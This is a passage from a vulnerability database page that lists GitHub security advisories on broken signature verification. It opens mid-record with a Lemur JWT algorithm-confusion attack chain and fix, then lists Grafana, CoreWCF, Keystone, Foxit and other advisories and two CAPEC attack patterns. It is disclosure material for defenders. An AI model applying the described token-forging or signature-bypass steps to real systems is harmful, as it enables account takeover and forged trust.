Lemur--\u003e\u003eAttacker: \"403 Forbidden\"\n\n    Note over Disclosure,Lemur: \"Chain step: separate disclosure leaks LEMUR_TOKEN_SECRET\"\n    Attacker-\u003e\u003eDisclosure: \"trigger debug / SSRF / backup leak\"\n    Disclosure--\u003e\u003eAttacker: \"LEMUR_TOKEN_SECRET value\"\n\n    Note over Attacker,Lemur: \"Forge HS256 admin token with leaked secret\"\n    Attacker-\u003e\u003eLemur: \"Bearer alg=HS256 admin token signed with leaked secret\"\n    Lemur-\u003e\u003eLemur: \"algorithms=[HS256] (taken from header) \u2014 accepted\"\n    Lemur--\u003e\u003eAttacker: \"200 OK, role=admin\"\n\n    Note over Audit: \"alg=HS256 in audit log - no anomaly flag because attacker picks alg\"\n```\n\n\u003ch2 data-heading=\"Impact Assessment\"\u003eImpact Assessment\u003c/h2\u003e\n\u003cp\u003eToday, in a fully-patched Lemur 1.9.0 on PyJWT 2.x, the standalone impact is C:L (audit-log surface is attacker-influenced) / I:L (an attacker who controls \u003ccode\u003ealg\u003c/code\u003e can downgrade a future verifier upgrade) / A:N. The vector requires no user interaction \u2014 the attacker just sends a crafted token directly \u2014 but AC:H reflects the real-world conditions that have to align (PyJWT version, future migration to asymmetric signing, or a separate disclosure issue) before standalone impact materializes. That\u0027s the 4.8 MEDIUM score. The chain step to single-request ATO depends on a separate disclosure issue, which I\u0027m not claiming as part of this report.\u003c/p\u003e\n\u003cp\u003eThe reason this is worth fixing now rather than later is that it\u0027s a one-line change with no behavioural risk, and the consequence of leaving it in place is a permanent downgrade vector against any algorithm migration Netflix later decides to do. Lemur\u0027s role in the certificate-signing pipeline makes its session tokens unusually high-value \u2014 anyone who forges a Lemur admin JWT can issue, revoke, and exfiltrate certificates across the org. The Lemur PKI compromise report submitted separately (ACME \u003ccode\u003eacme_url\u003c/code\u003e SSRF + creator IDOR) shows what an admin Lemur identity can do in practice.\u003c/p\u003e\n\u003cp\u003eIf Lemur ever moves to asymmetric signing without fixing this sink, the score moves to CRITICAL on the same day. Fix it now.\u003c/p\u003e\n\u003ch2 data-heading=\"Remediation\"\u003eRemediation\u003c/h2\u003e\n\u003cp\u003eOne-line server pin:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-python\"\u003e# lemur/lemur/auth/service.py:130-137\nallowed_algs = current_app.config.get(\"JWT_ALGORITHMS\", [\"HS256\"])\ntry:\n    payload = decode_with_multiple_secrets(\n        token, token_secrets, algorithms=allowed_algs\n    )\nexcept jwt.DecodeError:\n    return dict(message=\"Token is invalid\"), 403\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eThree follow-ups worth doing at the same time:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eLog the algorithm the server actually applied, separately from the algorithm in the token header.\u003c/strong\u003e This lets audit tooling see \"the server enforced HS256 and the token claimed HS256\" or, post-fix, \"the server enforced RS256 and the token claimed HS256 \u2014 rejected\", and flag mismatches.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePin \u003ccode\u003ealgorithms\u003c/code\u003e to the smallest possible set.\u003c/strong\u003e If Lemur only ever issues HS256, accept only HS256. Don\u0027t list every supported algorithm just because the library supports it.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMigrate to asymmetric signing in a separate hardening PR\u003c/strong\u003e once the algorithm pin is in. RS256 with key rotation removes the \"leaked secret = forge admin\" chain entirely.\u003c/li\u003e\n\u003c/ol\u003e",
  "id": "GHSA-r9gp-7f88-9r54",
  "modified": "2026-06-25T22:05:17Z",
  "published": "2026-06-25T22:05:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Netflix/lemur/security/advisories/GHSA-r9gp-7f88-9r54"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Netflix/lemur"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Netflix/lemur/releases/tag/v1.9.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": " Lemur: JWT verifier honors attacker-supplied alg, enabling ATO"
}

GHSA-RFFH-WMQ4-5XWM

Vulnerability from github – Published: 2025-09-19 03:30 – Updated: 2025-09-19 03:30
VLAI
Details

There is a vulnerability in the Supermicro BMC firmware validation logic at Supermicro MBD-X13SEM-F . An attacker can update the system firmware with a specially crafted image.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-6198"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-19T02:15:44Z",
    "severity": "MODERATE"
  },
  "details": "There is a vulnerability in the Supermicro BMC firmware validation logic at Supermicro MBD-X13SEM-F . An attacker can update the system firmware with a specially crafted image.",
  "id": "GHSA-rffh-wmq4-5xwm",
  "modified": "2025-09-19T03:30:51Z",
  "published": "2025-09-19T03:30:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6198"
    },
    {
      "type": "WEB",
      "url": "https://www.supermicro.com/en/support/security_BMC_IPMI_Sept_2025"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RHPJ-FHRV-WQ93

Vulnerability from github – Published: 2024-12-19 00:37 – Updated: 2024-12-19 00:37
VLAI
Details

A library injection vulnerability exists in Microsoft Outlook 16.83.3 for macOS. A specially crafted library can leverage Outlook's access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application's permissions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-42220"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-12-18T23:15:08Z",
    "severity": "HIGH"
  },
  "details": "A library injection vulnerability exists in Microsoft Outlook 16.83.3 for macOS. A specially crafted library can leverage Outlook\u0027s access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application\u0027s permissions.",
  "id": "GHSA-rhpj-fhrv-wq93",
  "modified": "2024-12-19T00:37:35Z",
  "published": "2024-12-19T00:37:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-42220"
    },
    {
      "type": "WEB",
      "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-1972"
    },
    {
      "type": "WEB",
      "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-1972"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RHXJ-GH46-JVW8

Vulnerability from github – Published: 2024-05-14 22:22 – Updated: 2024-11-18 16:26
VLAI
Summary
Grafana Plugin signature bypass
Details

Today we are releasing Grafana 9.2. Alongside with new features and other bug fixes, this release includes a Moderate severity security fix for CVE-2022-31123

We are also releasing security patches for Grafana 9.1.8 and Grafana 8.5.14 to fix these issues.

Release 9.2, latest release, also containing security fix:

Release 9.1.8, only containing security fix:

Release 8.5.14, only containing security fix:

Appropriate patches have been applied to Grafana Cloud and as always, we closely coordinated with all cloud providers licensed to offer Grafana Pro. They have received early notification under embargo and confirmed that their offerings are secure at the time of this announcement. This is applicable to Amazon Managed Grafana and Azure's Grafana as a service offering.

CVE-2022-31123

Summary

On July 4th as a result of an internal security audit we have discovered a bypass in the plugin signature verification by exploiting a versioning flaw.

We believe that this vulnerability is rated at CVSS 6.1 (CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L).

Impact

An attacker can convince a server admin to download and successfully run a malicious plugin even though unsigned plugins are not allowed.

Impacted versions

All installations for Grafana versions <=9.x, <=8.x, <=7.x

Solutions and mitigations

To fully address CVE-2022-31123 please upgrade your Grafana instances. Appropriate patches have been applied to Grafana Cloud.

Reporting security issues

If you think you have found a security vulnerability, please send a report to security@grafana.com. This address can be used for all of Grafana Labs' open source and commercial products (including, but not limited to Grafana, Grafana Cloud, Grafana Enterprise, and grafana.com). We can accept only vulnerability reports at this address. We would prefer that you encrypt your message to us by using our PGP key. The key fingerprint is

F988 7BEA 027A 049F AE8E 5CAA D125 8932 BE24 C5CA

The key is available from keyserver.ubuntu.com.

Security announcements

We maintain a security category on our blog, where we will always post a summary, remediation, and mitigation details for any patch containing security fixes.

You can also subscribe to our RSS feed.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/grafana/grafana"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.0.0"
            },
            {
              "fixed": "9.1.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/grafana/grafana"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0"
            },
            {
              "fixed": "8.5.14"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-31123"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-05-14T22:22:57Z",
    "nvd_published_at": "2022-10-13T22:15:00Z",
    "severity": "HIGH"
  },
  "details": "Today we are releasing Grafana 9.2. Alongside with new features and other bug fixes, this release includes a Moderate severity security fix for CVE-2022-31123\n\nWe are also releasing security patches for Grafana 9.1.8 and Grafana 8.5.14 to fix these issues.\n\nRelease 9.2, latest release, also containing security fix:\n\n- [Download Grafana 9.2](https://grafana.com/grafana/download/9.2)\n\nRelease 9.1.8, only containing security fix:\n\n- [Download Grafana 9.1.8](https://grafana.com/grafana/download/9.1.8)\n\nRelease 8.5.14, only containing security fix:\n\n- [Download Grafana 8.5.14](https://grafana.com/grafana/download/8.5.14)\n\nAppropriate patches have been applied to [Grafana Cloud](https://grafana.com/cloud) and as always, we closely coordinated with all cloud providers licensed to offer Grafana Pro. They have received early notification under embargo and confirmed that their offerings are secure at the time of this announcement. This is applicable to Amazon Managed Grafana and Azure\u0027s Grafana as a service offering.\n\n## CVE-2022-31123\n\n### Summary\nOn July 4th as a result of an internal security audit we have discovered a bypass in the plugin signature verification by exploiting a versioning flaw.\n\nWe believe that this vulnerability is rated at CVSS 6.1 (CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L). \n\n### Impact\nAn attacker can convince a server admin to download and successfully run a malicious plugin even though [unsigned plugins](https://grafana.com/docs/grafana/latest/administration/plugin-management/#allow-unsigned-plugins) are not allowed.\n\n### Impacted versions\n\nAll installations for Grafana versions \u003c=9.x, \u003c=8.x, \u003c=7.x\n\n### Solutions and mitigations\n\nTo fully address CVE-2022-31123 please upgrade your Grafana instances. \nAppropriate patches have been applied to [Grafana Cloud](https://grafana.com/cloud).\n\n### Reporting security issues\n\nIf you think you have found a security vulnerability, please send a report to security@grafana.com. This address can be used for all of Grafana Labs\u0027 open source and commercial products (including, but not limited to Grafana, Grafana Cloud, Grafana Enterprise, and grafana.com). We can accept only vulnerability reports at this address. We would prefer that you encrypt your message to us by using our PGP key. The key fingerprint is\n\nF988 7BEA 027A 049F AE8E 5CAA D125 8932 BE24 C5CA\n\nThe key is available from keyserver.ubuntu.com.\n\n### Security announcements\n\nWe maintain a [security category](https://community.grafana.com/c/support/security-announcements) on our blog, where we will always post a summary, remediation, and mitigation details for any patch containing security fixes.\n\nYou can also subscribe to our [RSS feed](https://grafana.com/tags/security/index.xml).",
  "id": "GHSA-rhxj-gh46-jvw8",
  "modified": "2024-11-18T16:26:41Z",
  "published": "2024-05-14T22:22:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/grafana/grafana/security/advisories/GHSA-rhxj-gh46-jvw8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31123"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/grafana/grafana"
    },
    {
      "type": "WEB",
      "url": "https://github.com/grafana/grafana/releases/tag/v9.1.8"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20221124-0002"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Grafana Plugin signature bypass"
}

GHSA-RJ4R-5Q3X-JCJP

Vulnerability from github – Published: 2022-05-13 01:02 – Updated: 2022-05-13 01:02
VLAI
Details

Insufficient consistency checks in signature handling in the networking stack in Google Chrome prior to 58.0.3029.81 for Mac, Windows, and Linux, and 58.0.3029.83 for Android, allowed a remote attacker to incorrectly accept a badly formed X.509 certificate via a crafted HTML page.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-5066"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-10-27T05:29:00Z",
    "severity": "MODERATE"
  },
  "details": "Insufficient consistency checks in signature handling in the networking stack in Google Chrome prior to 58.0.3029.81 for Mac, Windows, and Linux, and 58.0.3029.83 for Android, allowed a remote attacker to incorrectly accept a badly formed X.509 certificate via a crafted HTML page.",
  "id": "GHSA-rj4r-5q3x-jcjp",
  "modified": "2022-05-13T01:02:41Z",
  "published": "2022-05-13T01:02:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5066"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2017:1124"
    },
    {
      "type": "WEB",
      "url": "https://chromereleases.googleblog.com/2017/04/stable-channel-update-for-desktop.html"
    },
    {
      "type": "WEB",
      "url": "https://crbug.com/690821"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/201705-02"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/97939"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1038317"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RJJJ-VG83-2J3W

Vulnerability from github – Published: 2025-12-12 21:31 – Updated: 2025-12-17 21:30
VLAI
Details

A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions. This issue is fixed in macOS Sequoia 15.7.3. An app may be able to access user-sensitive data.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-43522"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-12T21:15:57Z",
    "severity": "LOW"
  },
  "details": "A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions. This issue is fixed in macOS Sequoia 15.7.3. An app may be able to access user-sensitive data.",
  "id": "GHSA-rjjj-vg83-2j3w",
  "modified": "2025-12-17T21:30:43Z",
  "published": "2025-12-12T21:31:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-43522"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/125886"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/125887"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RPJ7-HR7H-W6P9

Vulnerability from github – Published: 2026-06-19 20:46 – Updated: 2026-06-19 20:46
VLAI
Summary
CoreWCF: SamlSerializer skips SignatureValue verification when SAML signing token is not an X.509 certificate
Details

Impact

When a service is configured to validate SAML tokens using a method other than X.509 certificate signing, the final signature verification is skipped.

Preconditions

The service is configured to authenticate using SAML tokens and an out of band token resolver (commonly the IssuerTokenResolver of IssuedTokenServiceCredential) holds a non-X.509 SecurityToken whose key identifier the attacker can reference in the assertion’s <KeyInfo> - for example a BinarySecretSecurityToken representing the symmetric proof key issued by a WS-Trust symmetric-key holder-of-key STS.

Patches

Fixed in CoreWCF v1.8.1 and v1.9.1

Workarounds

None

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "CoreWCF.Primitives"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.8.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "CoreWCF.Primitives"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.9.0"
            },
            {
              "fixed": "1.9.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54774"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-345",
      "CWE-347"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T20:46:46Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Impact\nWhen a service is configured to validate SAML tokens using a method other than X.509 certificate signing, the final signature verification is skipped.\n\n#### Preconditions\nThe service is configured to authenticate using SAML tokens and an out of band token resolver (commonly the IssuerTokenResolver of IssuedTokenServiceCredential) holds a non-X.509 SecurityToken whose key identifier the attacker can reference in the assertion\u2019s `\u003cKeyInfo\u003e` - for example a `BinarySecretSecurityToken` representing the symmetric proof key issued by a WS-Trust symmetric-key holder-of-key STS.\n\n### Patches\nFixed in CoreWCF v1.8.1 and v1.9.1\n\n### Workarounds\nNone",
  "id": "GHSA-rpj7-hr7h-w6p9",
  "modified": "2026-06-19T20:46:46Z",
  "published": "2026-06-19T20:46:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/CoreWCF/CoreWCF/security/advisories/GHSA-rpj7-hr7h-w6p9"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/CoreWCF/CoreWCF"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "CoreWCF: SamlSerializer skips SignatureValue verification when SAML signing token is not an X.509 certificate"
}

GHSA-RQMW-G85W-M87F

Vulnerability from github – Published: 2025-12-11 18:30 – Updated: 2025-12-11 18:30
VLAI
Details

An issue was discovered in Foxit PDF and Editor for Windows and macOS before 13.2 and 2025 before 2025.2. A crafted PDF can use JavaScript to alter annotation content and subsequently clear the file's modification status via JavaScript interfaces. This circumvents digital signature verification by hiding document modifications, allowing an attacker to mislead users about the document's integrity and compromise the trustworthiness of signed PDFs.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-55311"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-11T16:16:25Z",
    "severity": "MODERATE"
  },
  "details": "An issue was discovered in Foxit PDF and Editor for Windows and macOS before 13.2 and 2025 before 2025.2. A crafted PDF can use JavaScript to alter annotation content and subsequently clear the file\u0027s modification status via JavaScript interfaces. This circumvents digital signature verification by hiding document modifications, allowing an attacker to mislead users about the document\u0027s integrity and compromise the trustworthiness of signed PDFs.",
  "id": "GHSA-rqmw-g85w-m87f",
  "modified": "2025-12-11T18:30:44Z",
  "published": "2025-12-11T18:30:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55311"
    },
    {
      "type": "WEB",
      "url": "https://www.foxit.com/support/security-bulletins.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RQW2-HHRF-7936

Vulnerability from github – Published: 2022-05-24 17:17 – Updated: 2024-09-27 21:21
VLAI
Summary
OpenStack Keystone does not check signature TTL of the EC2 credential auth method
Details

An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. The EC2 API doesn't have a signature TTL check for AWS Signature V4. An attacker can sniff the Authorization header, and then use it to reissue an OpenStack token an unlimited number of times.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keystone"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "16.0.0.0rc1"
            },
            {
              "fixed": "16.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keystone"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "15.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-12692"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-311",
      "CWE-347"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-07-13T17:10:16Z",
    "nvd_published_at": "2020-05-07T00:15:00Z",
    "severity": "MODERATE"
  },
  "details": "An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. The EC2 API doesn\u0027t have a signature TTL check for AWS Signature V4. An attacker can sniff the Authorization header, and then use it to reissue an OpenStack token an unlimited number of times.",
  "id": "GHSA-rqw2-hhrf-7936",
  "modified": "2024-09-27T21:21:47Z",
  "published": "2022-05-24T17:17:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12692"
    },
    {
      "type": "WEB",
      "url": "https://bugs.launchpad.net/keystone/+bug/1872737"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openstack/keystone"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/keystone/PYSEC-2020-56.yaml"
    },
    {
      "type": "WEB",
      "url": "https://opendev.org/openstack/keystone/commit/ab89ea749013e7f2c46260f68504f5687763e019"
    },
    {
      "type": "WEB",
      "url": "https://security.openstack.org/ossa/OSSA-2020-003.html"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4480-1"
    },
    {
      "type": "WEB",
      "url": "https://www.openwall.com/lists/oss-security/2020/05/06/4"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2020/05/07/1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenStack Keystone does not check signature TTL of the EC2 credential auth method"
}

GHSA-RR32-XPF4-HWJ6

Vulnerability from github – Published: 2024-04-09 18:30 – Updated: 2024-04-09 18:30
VLAI
Details

Improper privilege management in the installer for Zoom Desktop Client for Windows before version 5.17.10 may allow an authenticated user to conduct an escalation of privilege via local access.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-24694"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269",
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-04-09T18:15:08Z",
    "severity": "MODERATE"
  },
  "details": "Improper privilege management in the installer for Zoom Desktop Client for Windows before version 5.17.10 may allow an authenticated user to conduct an escalation of privilege via local access.",
  "id": "GHSA-rr32-xpf4-hwj6",
  "modified": "2024-04-09T18:30:28Z",
  "published": "2024-04-09T18:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24694"
    },
    {
      "type": "WEB",
      "url": "https://www.zoom.com/en/trust/security-bulletin/zsb-24011"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

No mitigation information available for this CWE.

CAPEC-463: Padding Oracle Crypto Attack

An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.

CAPEC-475: Signature Spoofing by Improper Validation

An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.